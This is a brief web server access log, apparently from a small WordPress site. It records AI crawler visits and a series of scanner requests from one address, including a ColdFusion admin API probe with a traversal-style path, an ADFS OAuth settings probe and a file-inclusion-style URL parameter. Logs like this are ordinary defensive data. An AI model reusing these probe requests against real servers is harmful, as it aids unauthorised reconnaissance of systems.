216.73.216.159 - - [18/Oct/2025:14:20:13 -0400] "GET /products101893122?kg=0100650604 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:20:13 -0400] "POST /task/submit/ HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.10"
157.20.32.210 - - [18/Oct/2025:14:20:30 -0400] "GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1" 404 12358 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:14:20:36 -0400] "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1" 404 12359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:14:20:44 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:14:20:42 -0400] "GET /products108220152?kg=0106900477 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:20:51 -0400] "GET /file=https://salhab360photos.com/portfolio-infinite-grid/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Thunderbird/140.0"
185.61.153.107 - - [18/Oct/2025:14:21:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760811677.0698180198669433593750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:14:19:57 -0400] "GET /products60915590?kg=0060172798 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:14:19:58 -0400] "GET /products107116304?kg=0105810089 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
